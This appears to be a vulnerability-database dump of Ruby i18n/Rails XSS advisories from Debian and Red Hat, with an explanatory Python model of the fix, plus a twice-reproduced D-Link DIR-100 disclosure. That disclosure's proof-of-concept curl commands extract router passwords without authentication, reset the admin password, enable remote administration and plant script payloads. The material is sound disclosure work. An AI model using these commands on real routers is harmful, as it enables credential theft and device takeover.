5353 root 2704 S -sh
7877 root 2568 S sleep 60
7953 root 2568 S sleep 60
8008 root 2704 R ps
16749 root 2704 S -sh
25690 root 0 SW< [RtmpCmdQTask]
25692 root 0 SW< [RtmpWscTask]
DSR-250N>
VAR-201312-0119 CVE-2013-4492 exceptions.rb in the i18n gem for Ruby cross-site scripting vulnerability CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
Cross-site scripting (XSS) vulnerability in exceptions.rb in the i18n gem before 0.6.6 for Ruby allows remote attackers to inject arbitrary web script or HTML via a crafted I18n::MissingTranslationData.new call. RubyGems i18n is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Versions prior to RubyGems i18n 0.6.6, and 0.5.1 are vulnerable.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2830-1                   security@debian.org
http://www.debian.org/security/                            Florian Weimer
December 30, 2013                      http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : ruby-i18n
Vulnerability  : cross-site scripting
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2013-4492

Peter McLarnan discovered that the internationalization component of Ruby on Rails does not properly encode parameters in generated HTML code, resulting in a cross-site scripting vulnerability. This update corrects the underlying vulnerability in the i18n gem, as provided by the ruby-i18n package.

The oldstable distribution (squeeze) is not affected by this problem; the libi18n-ruby package does not contain the vulnerable code.

For the stable distribution (wheezy), this problem has been fixed in version 0.6.0-3+deb7u1.

For the unstable distribution (sid), this problem has been fixed in version 0.6.9-1.

We recommend that you upgrade your ruby-i18n packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iQEcBAEBAgAGBQJSwfRdAAoJEL97/wQC1SS+xwAH/iI7ga/tjp1b8r//lKu3BBt5
GClsPWVKd9TBEYGHTM2ipskSU9+EDOkt/vhWH9TK2C5BA0eo68b6I2Gg8Z+BQzGa
SwfQmnIee/UX3gFi+mRnppyNp1WqAxEXvRNN/1JCiVevZAUEicnUx36xUn7paLIi
T+I2iae9LrCrP11XtU0KzNeg3ktt5QOTvOHIjlsdXoDHqT8EzjGalk99qA4fVK0I
FU2as0zhN6aZtnivhoIuc4P3u4XYoKhK7R4BL4bwW1KzSr4/LqZ2PAOLRexyWDwV
HJdfcR3WyRvpuxQKVFU9XF+agjBhWU98B8BWaC7O7aTsFYpwtHdtRN6PGJgCXUA=
=GovW
-----END PGP SIGNATURE-----
VAR-201312-0118 CVE-2013-4491 Cross-site scripting vulnerability in the Ruby on Rails internationalization component CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
Cross-site scripting (XSS) vulnerability in actionpack/lib/action_view/helpers/translation_helper.rb in the internationalization component in Ruby on Rails 3.x before 3.2.16 and 4.x before 4.0.2 allows remote attackers to inject arbitrary web script or HTML via a crafted string that triggers generation of a fallback string by the i18n gem. The translation helper is prone to cross-site scripting because it marks the "translation missing" fallback produced by the i18n gem as safe HTML without escaping the user-influenced key it contains. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. The companion issue in the i18n gem itself is CVE-2013-4492; i18n versions prior to 0.6.6 (and, on the 0.5 branch, prior to 0.5.1) are vulnerable.

Debian (ruby-actionpack-3.2): For the stable distribution (wheezy), these problems have been fixed in version 3.2.6-6+deb7u1. For the unstable distribution (sid), this problem has been fixed in version 3.2.16-3+0 of the rails-3.2 source package. We recommend that you upgrade your ruby-actionpack-3.2 packages.

An application using a third-party library that uses the Rack::Request interface, or custom Rack middleware, could bypass the protection implemented to fix the CVE-2013-0155 vulnerability, causing the application to receive unsafe parameters and become vulnerable to CVE-2013-0155 again.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=====================================================================
                   Red Hat Security Advisory

Synopsis:          Important: Subscription Asset Manager 1.4 security update
Advisory ID:       RHSA-2014:1863-01
Product:           Red Hat Subscription Asset Manager
Advisory URL:      https://rhn.redhat.com/errata/RHSA-2014-1863.html
Issue date:        2014-11-17
CVE Names:         CVE-2013-1854 CVE-2013-1855 CVE-2013-1857
                   CVE-2013-4491 CVE-2013-6414 CVE-2013-6415
                   CVE-2014-0130
=====================================================================

1. Summary:

Updated Subscription Asset Manager 1.4 packages that fix multiple security issues are now available.

Red Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.

2. Relevant releases/architectures:

Red Hat Subscription Asset Manager for RHEL 6 Server - noarch

3. Description:

Red Hat Subscription Asset Manager acts as a proxy for handling subscription information and software updates on client machines. Red Hat Subscription Asset Manager is built on Ruby on Rails, a model-view-controller (MVC) framework for web application development. Action Pack implements the controller and the view components.

A directory traversal flaw was found in the way Ruby on Rails handled wildcard segments in routes with implicit rendering. A remote attacker could use this flaw to retrieve arbitrary local files accessible to a Ruby on Rails application using the aforementioned routes via a specially crafted request. (CVE-2014-0130)

A flaw was found in the way Ruby on Rails handled hashes in certain queries. A remote attacker could use this flaw to perform a denial of service (resource consumption) attack by sending specially crafted queries that would result in the creation of Ruby symbols, which were never garbage collected. (CVE-2013-1854)

Two cross-site scripting (XSS) flaws were found in Action Pack. A remote attacker could use these flaws to conduct XSS attacks against users of an application using Action Pack. (CVE-2013-1855, CVE-2013-1857)

A cross-site scripting flaw was found in the way the internationalization component of Action Pack generated the fallback string for a missing translation. A remote attacker could possibly use this flaw to perform a reflective cross-site scripting (XSS) attack by providing a specially crafted input to an application using the aforementioned component. (CVE-2013-4491)

A denial of service flaw was found in the header handling component of Action View. A remote attacker could send strings in specially crafted headers that would be cached indefinitely, which would result in all available system memory eventually being consumed. (CVE-2013-6414)

It was found that the number_to_currency Action View helper did not properly escape the unit parameter. An attacker could use this flaw to perform a cross-site scripting (XSS) attack on an application that uses data submitted by a user in the unit parameter. (CVE-2013-6415)

Red Hat would like to thank Ruby on Rails upstream for reporting these issues. Upstream acknowledges Ben Murphy as the original reporter of CVE-2013-1854, Charlie Somerville as the original reporter of CVE-2013-1855, Alan Jenkins as the original reporter of CVE-2013-1857, Peter McLarnan as the original reporter of CVE-2013-4491, Toby Hsieh as the original reporter of CVE-2013-6414, and Ankit Gupta as the original reporter of CVE-2013-6415.

All Subscription Asset Manager users are advised to upgrade to these updated packages, which contain backported patches to correct these issues.

4. Solution:

Before applying this update, make sure all previously released errata relevant to your system have been applied.

This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

921329 - CVE-2013-1854 rubygem-activerecord: attribute_dos Symbol DoS vulnerability
921331 - CVE-2013-1855 rubygem-actionpack: css_sanitization: XSS vulnerability in sanitize_css
921335 - CVE-2013-1857 rubygem-actionpack: sanitize_protocol: XSS Vulnerability in the helper of Ruby on Rails
1036483 - CVE-2013-6414 rubygem-actionpack: Action View DoS
1036910 - CVE-2013-6415 rubygem-actionpack: number_to_currency XSS
1036922 - CVE-2013-4491 rubygem-actionpack: i18n missing translation XSS
1095105 - CVE-2014-0130 rubygem-actionpack: directory traversal issue

6. Package List:

Red Hat Subscription Asset Manager for RHEL 6 Server:

Source:
katello-1.4.3.28-1.el6sam_splice.src.rpm
ruby193-rubygem-actionmailer-3.2.17-1.el6sam.src.rpm
ruby193-rubygem-actionpack-3.2.17-6.el6sam.src.rpm
ruby193-rubygem-activemodel-3.2.17-1.el6sam.src.rpm
ruby193-rubygem-activerecord-3.2.17-5.el6sam.src.rpm
ruby193-rubygem-activeresource-3.2.17-1.el6sam.src.rpm
ruby193-rubygem-activesupport-3.2.17-2.el6sam.src.rpm
ruby193-rubygem-i18n-0.6.9-1.el6sam.src.rpm
ruby193-rubygem-mail-2.5.4-1.el6sam.src.rpm
ruby193-rubygem-rack-1.4.5-3.el6sam.src.rpm
ruby193-rubygem-rails-3.2.17-1.el6sam.src.rpm
ruby193-rubygem-railties-3.2.17-1.el6sam.src.rpm

noarch:
katello-common-1.4.3.28-1.el6sam_splice.noarch.rpm
katello-glue-candlepin-1.4.3.28-1.el6sam_splice.noarch.rpm
katello-glue-elasticsearch-1.4.3.28-1.el6sam_splice.noarch.rpm
katello-headpin-1.4.3.28-1.el6sam_splice.noarch.rpm
katello-headpin-all-1.4.3.28-1.el6sam_splice.noarch.rpm
ruby193-rubygem-actionmailer-3.2.17-1.el6sam.noarch.rpm
ruby193-rubygem-actionpack-3.2.17-6.el6sam.noarch.rpm
ruby193-rubygem-activemodel-3.2.17-1.el6sam.noarch.rpm
ruby193-rubygem-activerecord-3.2.17-5.el6sam.noarch.rpm
ruby193-rubygem-activeresource-3.2.17-1.el6sam.noarch.rpm
ruby193-rubygem-activesupport-3.2.17-2.el6sam.noarch.rpm
ruby193-rubygem-i18n-0.6.9-1.el6sam.noarch.rpm
ruby193-rubygem-mail-2.5.4-1.el6sam.noarch.rpm
ruby193-rubygem-rack-1.4.5-3.el6sam.noarch.rpm
ruby193-rubygem-rails-3.2.17-1.el6sam.noarch.rpm
ruby193-rubygem-railties-3.2.17-1.el6sam.noarch.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2013-1854
https://access.redhat.com/security/cve/CVE-2013-1855
https://access.redhat.com/security/cve/CVE-2013-1857
https://access.redhat.com/security/cve/CVE-2013-4491
https://access.redhat.com/security/cve/CVE-2013-6414
https://access.redhat.com/security/cve/CVE-2013-6415
https://access.redhat.com/security/cve/CVE-2014-0130
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2014 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iD8DBQFUai7iXlSAg2UNWIIRAmtEAJ9m+ZUXuva81fLz9G1CLKYi5aJoHACfcd3y
SoVal0zNgx0pwtSAkS1q5/0=
=i5aK
-----END PGP SIGNATURE-----

--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
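The two entries above (CVE-2013-4492 in the i18n gem and CVE-2013-4491 in the Rails translation helper) describe one chain: the gem formats a "translation missing" message that contains the requested key verbatim, and the Rails helper wraps that message in a placeholder span that it treats as already-safe HTML, so a key taken from a request parameter lands in the page unescaped. The following language-neutral model in Python is an added example, not code from the i18n gem, from Rails or from any of the advisories; the translation table, the placeholder markup and the function names are constructed to show the shape of the bug and its fix, not to reproduce the real helper.

```python
"""Model of the missing-translation XSS (CVE-2013-4492 / CVE-2013-4491).

Constructed example: this is not the i18n gem or the Rails helper, only the
shape of the bug. A translation lookup fails, the library formats a
"translation missing: <locale>.<key>" message from the requested key, and the
view helper wraps that message in a <span> that it treats as safe HTML. When
the key comes from a request parameter, the attacker controls the markup.
"""
import html
import re

# Constructed translation table standing in for the application's locale files.
TRANSLATIONS = {"en.greeting": "Hello"}


def missing_message(locale: str, key: str) -> str:
    """Message the i18n layer produces for a missing key (key is not escaped)."""
    return f"translation missing: {locale}.{key}"


def humanize(key: str) -> str:
    """Visible placeholder text: last key segment, underscores to spaces."""
    return key.split(".")[-1].replace("_", " ").capitalize()


def translate_vulnerable(key: str, locale: str = "en") -> str:
    """Pre-fix behaviour: raw strings are interpolated into markup that is then
    served as trusted HTML, so a key such as x<script>...</script> is rendered
    as live script in both the title attribute and the element body."""
    try:
        return TRANSLATIONS[f"{locale}.{key}"]
    except KeyError:
        return (
            f'<span class="translation_missing" '
            f'title="{missing_message(locale, key)}">{humanize(key)}</span>'
        )


def translate_fixed(key: str, locale: str = "en") -> str:
    """Post-fix behaviour: every attacker-influenced fragment is HTML-escaped
    (attribute value and element body) before the placeholder is treated as
    safe. quote=True also neutralises quotes that would break out of title=."""
    try:
        return TRANSLATIONS[f"{locale}.{key}"]
    except KeyError:
        title = html.escape(missing_message(locale, key), quote=True)
        body = html.escape(humanize(key), quote=True)
        return f'<span class="translation_missing" title="{title}">{body}</span>'


def has_raw_markup(fragment: str) -> bool:
    """True if the fragment contains any tag other than the placeholder's own
    <span>...</span>, i.e. the caller-supplied key leaked as markup."""
    return re.search(r"<(?!/?span[\s>])", fragment) is not None


if __name__ == "__main__":
    # Attacker-controlled key, as it would arrive in a request parameter.
    payload = "x<script>alert(1)</script>"
    print(translate_vulnerable(payload))  # the script tag survives intact
    print(translate_fixed(payload))       # rendered as &lt;script&gt;...
```

The point the two functions make is the one both CVEs share: escaping has to happen on the key before anything downstream marks the fallback as safe; escaping the finished placeholder instead would break the span itself.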
VAR-202002-0668 CVE-2013-7053 D-Link DIR-100 Cross-Site Request Forgery Vulnerability CVSS V2: 6.8
CVSS V3: 8.8
Severity: HIGH
D-Link DIR-100 contains a cross-site request forgery vulnerability. Information may be obtained, information may be altered, and a denial-of-service (DoS) condition may result. The D-Link DIR-100 Ethernet Broadband Router is a broadband router. Its web interface has a cross-site request forgery vulnerability that allows a remote attacker to build a malicious URI, entice a logged-in user to open it, and perform privileged operations in the context of that user, such as changing the administrator password. D-Link DIR-100 is prone to the following security vulnerabilities:
1. An authentication-bypass vulnerability
2. Multiple information-disclosure vulnerabilities
3. A cross-site request-forgery vulnerability
4. A cross-site scripting vulnerability
An attacker can exploit these issues to execute HTML and arbitrary script code in the browser of an unsuspecting user in the context of the affected device, steal cookie-based authentication credentials, bypass the authentication mechanism, and gain access to potentially sensitive information. Other attacks are also possible.
* Title: Router D-Link DIR-100 Multiple Vulnerabilities
* Date: 2013-12-18
* Author: Felix Richter
* Contact: root@euer.krebsco.de
* Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip
* Patched Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip
* Report Version: 2.0
* Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt
* Vulnerable: D-Link DIR-100
* Hardware Revision: D1
* Software Version: 4.03B07 (from 2012-04-10)
* CVE Numbers:
  * CWE-287 Authentication Issues: CVE-2013-7051
  * CWE-255 Issues with Credential Management: CVE-2013-7052
  * CWE-352 Cross-Site Request Forgery: CVE-2013-7053
  * CWE-79 Cross-Site Scripting: CVE-2013-7054
  * CWE-200 Information Disclosure: CVE-2013-7055
* Google Dork: "D-Link Systems" inurl:bsc_internet.htm D1
* State: Patched by Vendor
* Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8

# Table of Contents

1. Background
2. Vulnerability Description
3. Technical Description
4. Severity and Remediation
5. Timeline

# 1. Background

The DIR-100 is designed for easy and robust connectivity among heterogeneous standards-based network devices. Computers can communicate directly with this router for automatic opening and closing of UDP/TCP ports to take full advantage of the security provided without sacrificing functionality of on-line applications.

# 2. Vulnerability Description

Multiple vulnerabilities have been found in the D-Link DIR-100 Ethernet Broadband Router Revision D (and potentially other devices sharing the affected firmware) that could allow a remote attacker to:

- Retrieve the administrator password without authentication, leading to authentication bypass [CWE-255]
- Retrieve sensitive configuration parameters such as the PPPoE username and password without authentication [CWE-200]
- Execute privileged commands without authentication through a race condition, i.e. weak authentication enforcement [CWE-287]
- Send a formatted request to a victim whose browser then executes arbitrary commands on the device (CSRF) [CWE-352]
- Store arbitrary JavaScript code that is executed when a victim accesses the administrator interface [CWE-79]

The CVE numbers for these vulnerabilities are listed in the header above; they had not yet been assigned when the initial report was written (see the timeline).

# 3. Technical Description of the Vulnerabilities

## 3.0 The DIR-100 Web Interface and CGI

The DIR-100 web interface provides a CGI script at `/cliget.cgi` for unauthenticated requests and `/cli.cgi` for authenticated requests. The list of commands provided by each script can be retrieved with:

    curl 'http://192.168.1.104/cliget.cgi?cmd=help'
    # and respectively, when authenticated
    curl 'http://192.168.1.104/cli.cgi?cmd=help'

## 3.1 Authentication Bypass

### Description

The administrator password is not protected in any way on the device: anyone who can reach the administrative interface, which listens on port 80, can read it, and the request does not need to be authenticated.

### Proof of Concept

The web interface provides two distinct ways to retrieve the administrator password:

    curl 'http://192.168.0.1/cliget.cgi?cmd=$sys_user1'
    curl 'http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary'

## 3.2 Weak Authentication

### Description

As soon as a user is logged into the administration interface, the cli CGI is "unlocked" and can be used without authenticating first, because the CGI script does not check any other authentication parameters such as cookies or HTTP parameters. The only access check is whether the source IP address is the same as the logged-in user's.

### Proof of Concept

    # open the router interface in a web browser and log in
    firefox 'http://192.168.0.1/'
    # from another terminal or a second browser that is not logged in, try to access
    curl 'http://192.168.0.1/cli.cgi?cmd=help'
    # this request is treated as authenticated and is not redirected to the
    # login page. If no user is logged in, the request is redirected to the login page.

## 3.3 Retrieve Sensitive Information

### Description

Besides retrieving the administrator password without authentication, it is possible to retrieve other sensitive configuration from the device, such as the PPTP and PPPoE username and password, the configured DynDNS username and password, and the configured mail-log credentials, when these parameters are set. No authentication is required.

### Proof of Concept

    curl 'http://192.168.0.1/cliget.cgi?cmd=$ddns1'
    curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_user'
    curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_pass'
    curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_user'
    curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_pass'
    curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_user'
    curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd'

## 3.4 Cross-Site Request Forgery (CSRF)

### Description

CSRF attacks are launched by sending a formatted request to a victim and tricking the victim into loading it (often automatically), so that the request appears to come from the victim. Because cli.cgi authorizes requests by source IP address alone (see 3.2), any request issued from the logged-in administrator's browser is accepted. As an example, the attacker could change the administrator password (see the proof-of-concept code) and enable remote administration.

### Proof of Concept

Changing the administrator password works as soon as the client IP address is authenticated:

    # Log into DIR-100
    curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'
    # Change password
    curl 'http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin&pass=c%;$sys_passHash=4%25;commit'
    # enable remote console
    curl 'http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit'

## 3.5 Cross-Site Scripting (XSS)

### Description

An authenticated user can store data on the device that is not checked server-side for special characters, which results in persistent cross-site scripting. The victim (the administrator) then runs JavaScript in the context of the D-Link DIR-100 web interface. XSS is possible because input is filtered and validated only on the client side (in JavaScript); data sent directly to the CGI scripts is stored unchecked.

### Proof of Concept

    # Log into DIR-100
    curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'
    # XSS in Static IP Address Tab
    curl 'http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=<script>alert(1)</script>%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp='
    # XSS in Scheduler tab
    curl 'http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=<script>alert(1)</script>%26use=0%26idx=2%26;commit'

# 4. Severity and Remediation

These issues are considered very critical, especially when remote administration is enabled on the device. Weak authentication, combined with cross-site request forgery and authentication bypass, can result in a full device compromise from an arbitrary website the victim visits, even if remote administration is disabled on the Internet-facing port. It is recommended to upgrade the router to the newest D-Link DIR-100 firmware.

# 5. Timeline

- 2013-09-13 - First contact with D-Link support
- 2013-09-19 - Sent report
- 2013-10-14 - Requested status update; response: beta will be available mid October
- 2013-12-02 - Vendor publishes firmware update
- 2013-12-11 - Requested CVE IDs
- 2013-12-18 - Published the report
VAR-202002-0667 CVE-2013-7052 D-Link DIR-100 insufficient protection of credentials CVSS V2: 5.0
CVSS V3: 9.8
Severity: CRITICAL
D-Link DIR-100 4.03B07: security bypass via an error in the cliget.cgi script. D-Link DIR-100 contains a vulnerability related to insufficient protection of credentials. Information may be obtained, information may be altered, and a denial-of-service (DoS) condition may result. The D-Link DIR-100 Ethernet Broadband Router is a broadband router. Its cliget.cgi script answers requests without any authentication and returns, among other settings, the administrator credentials (for example through the $sys_user1 variable or the 'easysetup summary' command), so anyone who can reach the web interface on port 80 obtains the management password and can log in as the administrator. D-Link DIR-100 is prone to the following security vulnerabilities:
1. An authentication-bypass vulnerability
2. Multiple information-disclosure vulnerabilities
3. A cross-site request-forgery vulnerability
4. A cross-site scripting vulnerability
An attacker can exploit these issues to execute HTML and arbitrary script code in the browser of an unsuspecting user in the context of the affected device, steal cookie-based authentication credentials, bypass the authentication mechanism, and gain access to potentially sensitive information. Other attacks are also possible.
The full disclosure ("Router D-Link DIR-100 Multiple Vulnerabilities", Felix Richter, 2013-12-18) is reproduced above under VAR-202002-0668 / CVE-2013-7053.
VAR-202002-0666 CVE-2013-7051 D-Link DIR-100 authentication vulnerability CVSS V2: 6.8
CVSS V3: 8.8
Severity: HIGH
D-Link DIR-100 4.03B07: cli.cgi security bypass due to failure to check authentication parameters. D-Link DIR-100 contains an authentication vulnerability. Information may be obtained, information may be altered, and a denial-of-service (DoS) condition may result. The D-Link DIR-100 Ethernet Broadband Router is a broadband router. Its cli.cgi script authorizes requests by source IP address alone: once any user from a given address has logged into the web interface, every request from that address is accepted without checking cookies or any other HTTP parameter, so a remote attacker who can have the device receive a request from that address (for example through the logged-in administrator's browser) can execute privileged commands without authenticating. D-Link DIR-100 is prone to the following security vulnerabilities:
1. An authentication-bypass vulnerability
2. Multiple information-disclosure vulnerabilities
3. A cross-site request-forgery vulnerability
4. A cross-site scripting vulnerability
An attacker can exploit these issues to execute HTML and arbitrary script code in the browser of an unsuspecting user in the context of the affected device, steal cookie-based authentication credentials, bypass the authentication mechanism, and gain access to potentially sensitive information. Other attacks are also possible.
The full disclosure ("Router D-Link DIR-100 Multiple Vulnerabilities", Felix Richter, 2013-12-18) is reproduced above under VAR-202002-0668 / CVE-2013-7053.
VAR-202002-0669 CVE-2013-7054 D-Link DIR-100 Vulnerable to cross-site scripting CVSS V2: 4.3
CVSS V3: 6.1
Severity: MEDIUM
D-Link DIR-100 contains a cross-site scripting vulnerability. Information may be obtained and altered. The D-Link DIR-100 Ethernet Broadband Router is a broadband router device. It fails to properly filter input in the Static IP Address and Scheduler tabs of its web interface, allowing a remote attacker to build a malicious URI and entice a user to load it in order to obtain sensitive cookies, hijack sessions or perform malicious operations on the client side. The D-Link DIR-100 is prone to the following security vulnerabilities: 1. An authentication-bypass vulnerability 2. Multiple information-disclosure vulnerabilities 3. A cross-site request-forgery vulnerability 4. A cross-site scripting vulnerability. An attacker can exploit these issues to execute HTML and arbitrary script code in the browser of an unsuspecting user in the context of the affected device, steal cookie-based authentication credentials, bypass the authentication mechanism and gain access to potentially sensitive information. Other attacks are also possible. 
* Title: Router D-Link DIR-100 Multiple Vulnerabilities
* Date: 2013-12-18
* Author: Felix Richter
* Contact: root@euer.krebsco.de
* Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip
* Patched Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip
* Report Version: 2.0
* Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt
* Vulnerable: D-Link DIR-100
* Hardware Revision: D1
* Software Version: 4.03B07 (from 2012-04-10)
* CVE Numbers:
  * CWE-287 Authentication Issues: CVE-2013-7051
  * CWE-255 Issues with Credential Management: CVE-2013-7052
  * CWE-352 Cross-Site Request Forgery: CVE-2013-7053
  * CWE-79 Cross-Site Scripting: CVE-2013-7054
  * CWE-200 Information Disclosure: CVE-2013-7055
* Google Dork: "D-Link Systems" inurl:bsc_internet.htm D1
* State: Patched by Vendor
* Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8

# Table of Contents

1. Background
2. Vulnerability Description
3. Technical Description of the Vulnerabilities
4. Severity and Remediation
5. Timeline

# 1. Background

The DIR-100 is designed for easy and robust connectivity among heterogeneous standards-based network devices. Computers can communicate directly with this router for automatic opening and closing of UDP/TCP ports to take full advantage of the security provided without sacrificing functionality of on-line applications.

# 2 Vulnerability Description

Multiple vulnerabilities have been found in the D-Link DIR-100 Ethernet Broadband Router Revision D (and potentially other devices sharing the affected firmware) that allow a remote attacker to:

- Retrieve the administrator password without authentication, leading to authentication bypass [CWE-255]
- Retrieve sensitive configuration parameters such as the PPPoE username and password without authentication [CWE-200]
- Execute privileged commands without authenticating, because the CGI only checks that the request comes from an IP address that is currently logged in, i.e. authentication is enforced weakly [CWE-287]
- Send a crafted request to a victim whose browser then executes arbitrary commands on the device (CSRF) [CWE-352]
- Store arbitrary JavaScript code which is executed when a victim accesses the administrator interface [CWE-79]

The CVE numbers assigned to these vulnerabilities are listed in the header above.

# 3 Technical Description of the Vulnerabilities

## 3.0 The DIR-100 Web Interface and CGI

The DIR-100 web interface provides a CGI script at `/cliget.cgi` for unauthenticated users and one at `/cli.cgi` for authenticated requests. The list of commands provided by each script can be retrieved with:

    curl 'http://192.168.1.104/cliget.cgi?cmd=help'
    # and respectively when authenticated
    curl 'http://192.168.1.104/cli.cgi?cmd=help'

The proofs of concept below use 192.168.0.1 and 192.168.1.104 as the router address; substitute the address of the device under test.

## 3.1 Authentication Bypass

### Description

The administrator password is not protected in any way on the device: it can be read by anyone who can reach the administration interface, which listens on port 80. The request that retrieves the administrator password does not need to be authenticated.

### Proof of Concept

The web interface provides two distinct ways to retrieve the administrator password:

    curl 'http://192.168.0.1/cliget.cgi?cmd=$sys_user1'
    curl 'http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary'

## 3.2 Weak Authentication

### Description

As soon as a user is logged into the administration interface, the cli CGI is "unlocked" and can be used without authenticating first, because the CGI script does not check any other authentication parameter such as cookies or HTTP parameters. The only access check is whether the request comes from the same IP address as the logged-in user. Any process on the administrator's machine, and any host that shares its address (for example behind NAT), therefore inherits the session.

### Proof of Concept

    # open the router interface in a web browser and log in
    firefox 'http://192.168.0.1/'
    # open a new terminal or another web browser which is currently not logged
    # in and try to access
    curl 'http://192.168.0.1/cli.cgi?cmd=help'
    # this request will be treated as authenticated and will not be redirected
    # to the login page. If no user is logged in, the request is redirected to
    # the login page instead.

## 3.3 Retrieve Sensitive Information

### Description

Besides the administrator password, other sensitive configuration can be retrieved from the device without authentication: the PPTP and PPPoE username and password, the configured DynDNS username and password, and the credentials configured for mailing the log, whenever these parameters are set. No authentication is required.

### Proof of Concept

    curl 'http://192.168.0.1/cliget.cgi?cmd=$ddns1'
    curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_user'
    curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_pass'
    curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_user'
    curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_pass'
    curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_user'
    curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd'

## 3.4 Cross-Site Request Forgery (CSRF)

### Description

A CSRF attack is launched by crafting a request and tricking the victim into loading it (often automatically, for example through an image tag on a web page), so that the request appears to come from the victim. Because cli.cgi only checks the source IP address (see 3.2), a request triggered from the administrator's browser is accepted even though it carries no cookie or token tying it to the session. As an example the attacker could change the administrator password (see the proof-of-concept code) and enable remote administration.

### Proof of Concept

The administrator password can be changed by any request coming from an IP address that is currently logged in:

    # Log into DIR-100
    curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'
    # Change password
    curl 'http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin&pass=c%;$sys_passHash=4%25;commit'
    # enable remote console
    curl 'http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit'

## 3.5 Cross-Site Scripting (XSS)

### Description

An authenticated user can store data on the device that is not checked on the server side for special characters, which results in persistent cross-site scripting vulnerabilities. The victim (the administrator) then runs JavaScript code in the context of the D-Link DIR-100 web interface. XSS is possible because input is filtered and validated only on the client side (in JavaScript); data sent directly to the CGI scripts bypasses that filtering.

### Proof of Concept

    # Log into DIR-100
    curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'
    # XSS in Static IP Address Tab
    curl 'http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=<script>alert(1)</script>%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp='
    # XSS in Scheduler tab
    curl 'http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=<script>alert(1)</script>%26use=0%26idx=2%26;commit'

# 4 Severity and Remediation

These issues are considered very critical, especially when remote administration is enabled on the device. Weak authentication, combined with cross-site request forgery and the authentication bypass, can result in a full device compromise from an arbitrary website the victim visits, even if remote administration is disabled on the Internet port. It is recommended to upgrade the router to the newest firmware for the D-Link DIR-100 (the patched firmware linked in the header above).

# 5 Timeline

2013-09-13 - First contact with D-Link support
2013-09-19 - Sent report
2013-10-14 - Requested status update; response: beta will be available mid October
2013-12-02 - Vendor publishes firmware update
2013-12-11 - Requested CVE IDs
2013-12-18 - Report published
